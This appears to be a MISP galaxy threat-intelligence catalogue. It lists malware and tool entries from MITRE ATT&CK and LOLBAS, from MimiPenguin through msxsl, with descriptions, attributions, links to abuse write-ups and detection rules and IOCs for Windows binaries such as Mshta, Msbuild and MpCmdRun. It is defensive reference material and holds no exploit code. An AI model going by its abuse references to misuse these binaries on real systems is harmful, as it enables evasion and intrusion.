tags | ['d903e38b-600d-4736-9e3b-cf1a6e436481', 'c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '5fda51b0-dfda-49bd-8615-524b45d4cd44', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
MimiPenguin
MimiPenguin is a credential dumper, similar to Mimikatz, designed specifically for Linux platforms. [MimiPenguin GitHub May 2017]
Internal MISP references
UUID 42350632-b59a-4cc5-995e-d95d8c608553
which can be used as unique global reference for MimiPenguin
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0179 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Miner-C
Miner-C is malware that mines victims for the Monero cryptocurrency. It has targeted FTP servers and Network Attached Storage (NAS) devices to spread. [Softpedia MinerC]
Internal MISP references
UUID c0dea9db-1551-4f6c-8a19-182efc34093a
which can be used as unique global reference for Miner-C
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0133 |
source | MITRE |
type | ['malware'] |
MiniDuke
MiniDuke is malware that was used by APT29 from 2010 to 2015. The MiniDuke toolset consists of multiple downloader and backdoor components. The loader has been used with other MiniDuke components as well as in conjunction with CosmicDuke and PinchDuke. [F-Secure The Dukes]
Internal MISP references
UUID 2bb16809-6bc3-46c3-b28a-39cb49410340
which can be used as unique global reference for MiniDuke
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0051 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
MirageFox
MirageFox is a remote access tool used against Windows systems. It appears to be an upgraded version of a tool known as Mirage, which is a RAT believed to originate in 2012. [APT15 Intezer June 2018]
Internal MISP references
UUID 535f1b97-7a70-4d18-be4e-3a9f74ccf78a
which can be used as unique global reference for MirageFox
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0280 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Misdat
Misdat is a backdoor that was used in Operation Dust Storm from 2010 to 2011.[Cylance Dust Storm]
Internal MISP references
UUID 4048afa2-79c8-4d38-8219-2207adddd884
which can be used as unique global reference for Misdat
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0083 |
source | MITRE |
type | ['malware'] |
Mispadu
Mispadu is a banking trojan written in Delphi that was first observed in 2019 and uses a Malware-as-a-Service (MaaS) business model.[ESET Security Mispadu Facebook Ads 2019][SCILabs Malteiro 2021] This malware is operated, managed, and sold by the Malteiro cybercriminal group.[SCILabs Malteiro 2021] Mispadu has mainly been used to target victims in Brazil and Mexico, and has also had confirmed operations throughout Latin America and Europe.[SCILabs Malteiro 2021][SCILabs URSA/Mispadu Evolution 2023][Segurança Informática URSA Sophisticated Loader 2020]
Internal MISP references
UUID 758e5226-6015-5cc7-af4b-20fa35c9bac1
which can be used as unique global reference for Mispadu
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1122 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Mis-Type
Mis-Type is a backdoor hybrid that was used in Operation Dust Storm by 2012.[Cylance Dust Storm]
Internal MISP references
UUID fe554d2e-f974-41d6-8e7a-701bd758355d
which can be used as unique global reference for Mis-Type
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0084 |
source | MITRE |
type | ['malware'] |
Mivast
Mivast is a backdoor that has been used by Deep Panda. It was reportedly used in the Anthem breach. [Symantec Black Vine]
Internal MISP references
UUID f603ea32-91c3-4b62-a60f-57670433b080
which can be used as unique global reference for Mivast
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0080 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Mmc
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Load snap-ins to locally and remotely manage Windows systems.
Author: @bohops
Paths:
* C:\Windows\System32\mmc.exe
* C:\Windows\SysWOW64\mmc.exe
Resources:
* https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
* https://offsec.almond.consulting/UAC-bypass-dotnet.html
Detection:
* Sigma: proc_creation_win_mmc_susp_child_process.yml
* Sigma: file_event_win_uac_bypass_dotnet_profiler.yml
[Mmc.exe - LOLBAS Project]
Internal MISP references
UUID 8c7acae2-f844-4e01-86d8-18c3ea90963f
which can be used as unique global reference for Mmc
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5126 |
source | Tidal Cyber |
tags | ['f9e6382f-e41e-438e-bd7e-57a57046d9e6', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
MobileOrder
MobileOrder is a Trojan intended to compromise Android mobile devices. It has been used by Scarlet Mimic. [Scarlet Mimic Jan 2016]
Internal MISP references
UUID 116f913c-0d5e-43d1-ba0d-3a12127af8f6
which can be used as unique global reference for MobileOrder
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0079 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
MoleNet
MoleNet is a downloader tool with backdoor capabilities that has been observed in use since at least 2019.[Cybereason Molerats Dec 2020]
Internal MISP references
UUID 7ca5debb-f813-4e06-98f8-d1186552e5d2
which can be used as unique global reference for MoleNet
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0553 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Mongall
Mongall is a backdoor that has been used since at least 2013, including by Aoqin Dragon.[SentinelOne Aoqin Dragon June 2022]
Internal MISP references
UUID 7f5355b3-e819-4c82-a0fa-b80fda8fd6e6
which can be used as unique global reference for Mongall
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1026 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
MoonWind
MoonWind is a remote access tool (RAT) that was used in 2016 to target organizations in Thailand. [Palo Alto MoonWind March 2017]
Internal MISP references
UUID a699f32f-6596-4060-8fcd-42587a844b80
which can be used as unique global reference for MoonWind
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0149 |
source | MITRE |
type | ['malware'] |
More_eggs
More_eggs is a JScript backdoor used by Cobalt Group and FIN6. Its name was given based on the variable "More_eggs" being present in its code. There are at least two different versions of the backdoor being used, version 2.0 and version 4.4. [Talos Cobalt Group July 2018][Security Intelligence More Eggs Aug 2019]
Internal MISP references
UUID 69f202e7-4bc9-4f4f-943f-330c053ae977
which can be used as unique global reference for More_eggs
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0284 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Mori
Mori is a backdoor that has been used by MuddyWater since at least January 2022.[DHS CISA AA22-055A MuddyWater February 2022][CYBERCOM Iranian Intel Cyber January 2022]
Internal MISP references
UUID 385e1eaf-9ba8-4381-981a-3c7af718a77d
which can be used as unique global reference for Mori
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1047 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Mosquito
Mosquito is a Win32 backdoor that has been used by Turla. Mosquito is made up of three parts: the installer, the launcher, and the backdoor. The main backdoor is called CommanderDLL and is launched by the loader program. [ESET Turla Mosquito Jan 2018]
Internal MISP references
UUID c3939dad-d728-4ddb-804e-cf1e3743a55d
which can be used as unique global reference for Mosquito
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0256 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
MpCmdRun
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender.
Author: Oddvar Moe
Paths:
* C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe
* C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe
* C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe
Resources:
* https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus
* https://twitter.com/mohammadaskar2/status/1301263551638761477
* https://twitter.com/Oddvarmoe/status/1301444858910052352
* https://twitter.com/NotMedic/status/1301506813242867720
Detection:
* Sigma: win_susp_mpcmdrun_download.yml
* Elastic: command_and_control_remote_file_copy_mpcmdrun.toml
* IOC: MpCmdRun storing data into alternate data streams.
* IOC: MpCmdRun retrieving a file from a remote machine or the internet that is not expected.
* IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe.
* IOC: Monitor for the creation of %USERPROFILE%\AppData\Local\Temp\MpCmdRun.log
* IOC: User Agent is "MpCommunication"
[MpCmdRun.exe - LOLBAS Project]
Internal MISP references
UUID ec54a1e4-92d4-4503-a510-a18989f1f8f3
which can be used as unique global reference for MpCmdRun
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5127 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Msbuild
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used to compile and execute code.
Author: Oddvar Moe
Paths:
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
* C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
* C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
* C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe
Resources:
* https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md
* https://github.com/Cn33liz/MSBuildShell
* https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
* https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191
* https://github.com/LOLBAS-Project/LOLBAS/issues/165
* https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files
* https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events
Detection:
* Sigma: file_event_win_shell_write_susp_directory.yml
* Sigma: proc_creation_win_msbuild_susp_parent_process.yml
* Sigma: net_connection_win_silenttrinity_stager_msbuild_activity.yml
* Splunk: suspicious_msbuild_spawn.yml
* Splunk: suspicious_msbuild_rename.yml
* Splunk: msbuild_suspicious_spawned_by_script_process.yml
* Elastic: defense_evasion_msbuild_beacon_sequence.toml
* Elastic: defense_evasion_msbuild_making_network_connections.toml
* Elastic: defense_evasion_execution_msbuild_started_by_script.toml
* Elastic: defense_evasion_execution_msbuild_started_by_office_app.toml
* Elastic: defense_evasion_execution_msbuild_started_renamed.toml
* BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
* IOC: Msbuild.exe should not normally be executed on workstations
[LOLBAS Msbuild]
Internal MISP references
UUID 1f500e4c-25a1-4570-a3ba-5c9cd463afde
which can be used as unique global reference for Msbuild
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5128 |
source | Tidal Cyber |
tags | ['dfda978e-e0a0-4e1a-85c7-d9ab2cd7ccc5', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Msconfig
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: MSConfig is a troubleshooting tool used to temporarily disable or re-enable software, device drivers or Windows services that run during the startup process, to help the user determine the cause of a problem with Windows.
Author: Oddvar Moe
Paths:
* C:\Windows\System32\msconfig.exe
Resources:
* https://twitter.com/pabraeken/status/991314564896690177
Detection:
* Sigma: proc_creation_win_uac_bypass_msconfig_gui.yml
* Sigma: file_event_win_uac_bypass_msconfig_gui.yml
* IOC: mscfgtlc.xml changes in system32 folder
[Msconfig.exe - LOLBAS Project]
Internal MISP references
UUID 90c6cc43-d9dd-436c-b7ee-ede979765bdf
which can be used as unique global reference for Msconfig
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5129 |
source | Tidal Cyber |
tags | ['7e20fe4e-6883-457d-81f9-b4010e739f89', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Msdeploy
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft tool used to deploy Web Applications.
Author: Oddvar Moe
Paths:
* C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe
Resources:
* https://twitter.com/pabraeken/status/995837734379032576
* https://twitter.com/pabraeken/status/999090532839313408
Detection:
* Sigma: proc_creation_win_lolbin_msdeploy.yml
[Msdeploy.exe - LOLBAS Project]
Internal MISP references
UUID 175b32ed-bea6-491c-8aac-d088f642a6e1
which can be used as unique global reference for Msdeploy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5226 |
source | Tidal Cyber |
tags | ['11452158-b8d2-4a33-952a-8896f961a2f5', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Msdt
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft diagnostics tool.
Author: Oddvar Moe
Paths:
* C:\Windows\System32\Msdt.exe
* C:\Windows\SysWOW64\Msdt.exe
Resources:
* https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
* https://twitter.com/harr0ey/status/991338229952598016
* https://twitter.com/nas_bench/status/1531944240271568896
Detection:
* Sigma: proc_creation_win_lolbin_msdt_answer_file.yml
* Sigma: proc_creation_win_msdt_arbitrary_command_execution.yml
* Elastic: defense_evasion_network_connection_from_windows_binary.toml
[Msdt.exe - LOLBAS Project]
Internal MISP references
UUID bc39280c-da92-4e78-ab37-7c54ff72a1ba
which can be used as unique global reference for Msdt
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5130 |
source | Tidal Cyber |
tags | ['8c30b46b-3651-4ccd-9d91-34fe89bc6843', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Msedge
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Edge browser
Author: mr.d0x
Paths:
* c:\Program Files\Microsoft\Edge\Application\msedge.exe
* c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Resources:
* https://twitter.com/mrd0x/status/1478116126005641220
* https://twitter.com/mrd0x/status/1478234484881436672
Detection:
* Sigma: proc_creation_win_browsers_msedge_arbitrary_download.yml
* Sigma: proc_creation_win_browsers_chromium_headless_file_download.yml
[Msedge.exe - LOLBAS Project]
Internal MISP references
UUID d64d75ba-1722-4a39-ab7f-d46c5d5815ec
which can be used as unique global reference for Msedge
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5131 |
source | Tidal Cyber |
tags | ['5bd3af6b-cb96-4d96-9576-26521dd76513', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
msedge_proxy
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Edge Browser
Author: Mert Daş
Paths:
* C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
Resources: None Provided
Detection: None Provided
[msedge_proxy.exe - LOLBAS Project]
Internal MISP references
UUID e098413e-1d54-4d1f-bf63-1443b57bcc2f
which can be used as unique global reference for msedge_proxy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5182 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
msedgewebview2
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: msedgewebview2.exe is the executable file for Microsoft Edge WebView2, which is a web browser control used by applications to display web content.
Author: Matan Bahar
Paths:
* C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe
Resources:
* https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf
Detection:
* IOC: msedgewebview2.exe spawned with any of the following: --gpu-launcher, --utility-cmd-prefix, --renderer-cmd-prefix, --browser-subprocess-path
[msedgewebview2.exe - LOLBAS Project]
Internal MISP references
UUID ac6d4ab8-f34c-4b00-a943-cc2749b28a05
which can be used as unique global reference for msedgewebview2
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5183 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Mshta
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows to execute HTML applications (.hta).
Author: Oddvar Moe
Paths:
* C:\Windows\System32\mshta.exe
* C:\Windows\SysWOW64\mshta.exe
Resources:
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Detection:
* Sigma: proc_creation_win_mshta_susp_pattern.yml
* Sigma: proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml
* Sigma: proc_creation_win_mshta_lethalhta_technique.yml
* Sigma: proc_creation_win_mshta_javascript.yml
* Sigma: file_event_win_net_cli_artefact.yml
* Sigma: image_load_susp_script_dotnet_clr_dll_load.yml
* Elastic: defense_evasion_mshta_beacon.toml
* Elastic: lateral_movement_dcom_hta.toml
* Elastic: defense_evasion_suspicious_managedcode_host_process.toml
* Splunk: suspicious_mshta_activity.yml
* Splunk: detect_mshta_renamed.yml
* Splunk: suspicious_mshta_spawn.yml
* Splunk: suspicious_mshta_child_process.yml
* Splunk: detect_mshta_url_in_command_line.yml
* BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
* IOC: mshta.exe executing raw or obfuscated script within the command-line
* IOC: General usage of HTA file
* IOC: mshta.exe network connection to Internet/WWW resource
* IOC: DotNet CLR libraries loaded into mshta.exe
* IOC: DotNet CLR Usage Log - mshta.exe.log
[LOLBAS Mshta]
Internal MISP references
UUID f552a5a4-49dd-4ba6-9916-e631df4d4457
which can be used as unique global reference for Mshta
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5132 |
source | Tidal Cyber |
tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'fe0e2dd3-962e-41a3-9850-cea146b1301f', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Mshtml
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft HTML Viewer
Author: LOLBAS Team
Paths:
* c:\windows\system32\mshtml.dll
* c:\windows\syswow64\mshtml.dll
Resources:
* https://twitter.com/pabraeken/status/998567549670477824
* https://windows10dll.nirsoft.net/mshtml_dll.html
Detection:
* Sigma: proc_creation_win_rundll32_susp_activity.yml
[Mshtml.dll - LOLBAS Project]
Internal MISP references
UUID f94674b9-f924-4452-8516-49657ed40032
which can be used as unique global reference for Mshtml
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5192 |
source | Tidal Cyber |
tags | ['46338353-52ee-4f8d-9f18-f1b32644dd76', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Msiexec
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows to execute MSI files.
Author: Oddvar Moe
Paths:
* C:\Windows\System32\msiexec.exe
* C:\Windows\SysWOW64\msiexec.exe
Resources:
* https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
* https://twitter.com/PhilipTsukerman/status/992021361106268161
* https://badoption.eu/blog/2023/10/03/MSIFortune.html
Detection:
* Sigma: proc_creation_win_msiexec_web_install.yml
* Sigma: proc_creation_win_msiexec_masquerading.yml
* Elastic: defense_evasion_network_connection_from_windows_binary.toml
* Splunk: uninstall_app_using_msiexec.yml
* IOC: msiexec.exe retrieving files from Internet
[LOLBAS Msiexec]
Internal MISP references
UUID 9d00d3c4-9a01-403a-9275-c94960fd871f
which can be used as unique global reference for Msiexec
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5133 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'fc2bbc6f-da5c-4afd-ae27-2fadf77c3bc4', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
MsoHtmEd
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Office component
Author: Nir Chako
Paths:
* C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe
* C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe
* C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.exe
* C:\Program Files\Microsoft Office\Office16\MSOHTMED.exe
* C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSOHTMED.exe
* C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSOHTMED.exe
* C:\Program Files (x86)\Microsoft Office\Office15\MSOHTMED.exe
* C:\Program Files\Microsoft Office\Office15\MSOHTMED.exe
* C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSOHTMED.exe
* C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSOHTMED.exe
* C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.exe
* C:\Program Files\Microsoft Office\Office14\MSOHTMED.exe
* C:\Program Files (x86)\Microsoft Office\Office12\MSOHTMED.exe
* C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe
* C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe
Resources: None Provided
Detection:
* Sigma: proc_creation_win_lolbin_msohtmed_download.yml
* IOC: Suspicious Office application internet/network traffic
[MsoHtmEd.exe - LOLBAS Project]
Internal MISP references
UUID d316ab94-0420-4356-a3bb-f92f42a4247c
which can be used as unique global reference for MsoHtmEd
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5227 |
source | Tidal Cyber |
tags | ['874c053b-d6b8-42c2-accc-cd256bb4d350', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Mspub
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Publisher
Author: Nir Chako
Paths: * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSPUB.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSPUB.exe * C:\Program Files (x86)\Microsoft Office\Office16\MSPUB.exe * C:\Program Files\Microsoft Office\Office16\MSPUB.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSPUB.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSPUB.exe * C:\Program Files (x86)\Microsoft Office\Office15\MSPUB.exe * C:\Program Files\Microsoft Office\Office15\MSPUB.exe * C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSPUB.exe * C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSPUB.exe * C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.exe * C:\Program Files\Microsoft Office\Office14\MSPUB.exe
Resources: None Provided
Detection: * Sigma: proc_creation_win_lolbin_mspub_download.yml * IOC: Suspicious Office application internet/network traffic[Mspub.exe - LOLBAS Project]
Internal MISP references
UUID c07f48ee-4667-4dd3-aa8e-cb6d588c547c
which can be used as unique global reference for Mspub
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5228 |
source | Tidal Cyber |
tags | ['a523dcb0-9181-4170-a113-126df84594ca', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
msxsl
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Command line utility used to perform XSL transformations.
Author: Oddvar Moe
Paths: * no default
Resources: * https://twitter.com/subTee/status/877616321747271680 * https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker * https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file
Detection: * Sigma: proc_creation_win_wmic_xsl_script_processing.yml * Elastic: defense_evasion_msxsl_beacon.toml * Elastic: defense_evasion_msxsl_network.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml[msxsl.exe - LOLBAS Project]
Internal MISP references
UUID 8cccbfed-3f78-45fd-b5d1-efe884d28f09
